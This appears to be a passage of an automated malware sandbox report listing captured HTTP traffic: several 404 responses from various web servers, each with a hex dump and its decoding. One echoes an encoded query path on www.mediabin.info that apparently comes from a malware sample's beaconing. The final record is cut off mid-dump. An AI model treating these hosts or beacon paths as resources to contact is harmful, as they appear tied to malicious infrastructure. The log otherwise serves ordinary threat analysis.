Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 25 Apr 2025 14:06:30 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecontent-type: text/htmlcontent-length: 238content-encoding: gzipvary: Accept-Encoding,User-Agentdate: Fri, 25 Apr 2025 14:07:50 GMTserver: LiteSpeedData Raw: 1f 8b 08 00 00 00 00 00 00 03 4c 8b b1 0e 82 40 10 05 fb fb 8a 95 5e 17 0c e5 66 13 61 97 dc 25 27 10 b3 14 f4 5c 42 25 51 e1 ff 0d d2 58 be 99 79 74 92 ae b6 b1 57 f0 76 8f d0 0f 55 0c 35 64 67 c4 a0 d6 20 8a c9 61 ae 97 1c 51 db 8c 1d ed 9b c9 eb 4d d8 91 05 8b ca 65 5e 42 bb ac d0 2c db 73 22 3c a0 23 fc 45 54 75 32 ee bf 82 ff 1a 5f b0 b3 39 c1 3b bd b6 f4 59 d3 04 c3 23 c2 17 00 00 ff ff d2 cf ad ac 4c d3 57 28 4f 2c 56 c8 cb 2f 51 48 cb 2f cd 4b 51 c8 cf 53 28 c9 c8 2c 56 28 4e 2d 2a 4b 2d d2 e3 b2 f1 08 b2 e3 b2 f1 b4 2b 2f 2f d7 cb 4d 4d c9 4c 4c ca cc d3 cb cc 4b cb 07 00 00 00 ff ff b2 d1 f7 b4 e3 b2 d1 77 f2 77 89 b4 b3 d1 f7 08 f1 f5 b1 e3 1a c9 00 00 00 00 ff ff 03 00 5a 9e c5 37 de 01 00 00 Data Ascii: L@^fa%'\B%QXytWvU5dg aQMe^B,s"<#ETu2_9;Y#LW(O,V/QH/KQS(,V(N-*K-+//MMLLKwwZ7
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecontent-type: text/htmlcontent-length: 238content-encoding: gzipvary: Accept-Encoding,User-Agentdate: Fri, 25 Apr 2025 14:07:52 GMTserver: LiteSpeedData Raw: 1f 8b 08 00 00 00 00 00 00 03 4c 8b b1 0e 82 40 10 05 fb fb 8a 95 5e 17 0c e5 66 13 61 97 dc 25 27 10 b3 14 f4 5c 42 25 51 e1 ff 0d d2 58 be 99 79 74 92 ae b6 b1 57 f0 76 8f d0 0f 55 0c 35 64 67 c4 a0 d6 20 8a c9 61 ae 97 1c 51 db 8c 1d ed 9b c9 eb 4d d8 91 05 8b ca 65 5e 42 bb ac d0 2c db 73 22 3c a0 23 fc 45 54 75 32 ee bf 82 ff 1a 5f b0 b3 39 c1 3b bd b6 f4 59 d3 04 c3 23 c2 17 00 00 ff ff d2 cf ad ac 4c d3 57 28 4f 2c 56 c8 cb 2f 51 48 cb 2f cd 4b 51 c8 cf 53 28 c9 c8 2c 56 28 4e 2d 2a 4b 2d d2 e3 b2 f1 08 b2 e3 b2 f1 b4 2b 2f 2f d7 cb 4d 4d c9 4c 4c ca cc d3 cb cc 4b cb 07 00 00 00 ff ff b2 d1 f7 b4 e3 b2 d1 77 f2 77 89 b4 b3 d1 f7 08 f1 f5 b1 e3 1a c9 00 00 00 00 ff ff 03 00 5a 9e c5 37 de 01 00 00 Data Ascii: L@^fa%'\B%QXytWvU5dg aQMe^B,s"<#ETu2_9;Y#LW(O,V/QH/KQS(,V(N-*K-+//MMLLKwwZ7
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecontent-type: text/htmlcontent-length: 238content-encoding: gzipvary: Accept-Encoding,User-Agentdate: Fri, 25 Apr 2025 14:07:55 GMTserver: LiteSpeedData Raw: 1f 8b 08 00 00 00 00 00 00 03 4c 8b b1 0e 82 40 10 05 fb fb 8a 95 5e 17 0c e5 66 13 61 97 dc 25 27 10 b3 14 f4 5c 42 25 51 e1 ff 0d d2 58 be 99 79 74 92 ae b6 b1 57 f0 76 8f d0 0f 55 0c 35 64 67 c4 a0 d6 20 8a c9 61 ae 97 1c 51 db 8c 1d ed 9b c9 eb 4d d8 91 05 8b ca 65 5e 42 bb ac d0 2c db 73 22 3c a0 23 fc 45 54 75 32 ee bf 82 ff 1a 5f b0 b3 39 c1 3b bd b6 f4 59 d3 04 c3 23 c2 17 00 00 ff ff d2 cf ad ac 4c d3 57 28 4f 2c 56 c8 cb 2f 51 48 cb 2f cd 4b 51 c8 cf 53 28 c9 c8 2c 56 28 4e 2d 2a 4b 2d d2 e3 b2 f1 08 b2 e3 b2 f1 b4 2b 2f 2f d7 cb 4d 4d c9 4c 4c ca cc d3 cb cc 4b cb 07 00 00 00 ff ff b2 d1 f7 b4 e3 b2 d1 77 f2 77 89 b4 b3 d1 f7 08 f1 f5 b1 e3 1a c9 00 00 00 00 ff ff 03 00 5a 9e c5 37 de 01 00 00 Data Ascii: L@^fa%'\B%QXytWvU5dg aQMe^B,s"<#ETu2_9;Y#LW(O,V/QH/KQS(,V(N-*K-+//MMLLKwwZ7
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecontent-type: text/htmlcontent-length: 621date: Fri, 25 Apr 2025 14:07:58 GMTserver: LiteSpeedvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6d 79 79 66 2f 3f 4e 56 30 78 3d 47 6c 63 47 59 43 36 48 77 70 54 38 46 61 62 6b 43 32 74 49 49 76 4c 37 38 74 69 4e 37 36 62 63 66 56 38 34 70 6c 77 62 35 4e 6b 33 6e 6b 77 45 2b 41 4b 63 2b 57 77 2f 6f 62 64 41 74 4b 53 44 79 72 44 7a 6f 4e 68 6e 30 6a 47 71 48 58 78 38 4a 39 4e 73 64 78 61 61 6a 6d 54 48 31 61 67 6e 35 47 35 64 4d 55 4a 61 68 78 72 73 5a 63 63 44 70 51 58 79 77 35 41 3d 26 61 6d 70 3b 66 78 3d 50 4a 71 48 77 4a 49 78 6b 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 48 52 3e 0a 3c 49 3e 77 77 77 2e 6d 65 64 69 61 62 69 6e 2e 69 6e 66 6f 3c 2f 49 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /myyf/?NV0x=GlcGYC6HwpT8FabkC2tIIvL78tiN76bcfV84plwb5Nk3nkwE+AKc+Ww/obdAtKSDyrDzoNhn0jGqHXx8J9NsdxaajmTH1agn5G5dMUJahxrsZccDpQXyw5A=&fx=PJqHwJIxk was not found on this server.<HR><I>www.mediabin.info</I></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 25 Apr 2025 14:08:04 GMTContent-Type: text/htmlContent-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 25 Apr 2025 14:08:08 GMTContent-Type: text/htmlContent-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 25 Apr 2025 14:08:14 GMTContent-Type: text/htmlContent-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 25 Apr 2025 14:08:21 GMTContent-Type: text/htmlContent-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 25 Apr 2025 14:08:24 GMTContent-Type: text/htmlContent-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 25 Apr 2025 14:08:27 GMTContent-Type: text/htmlContent-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 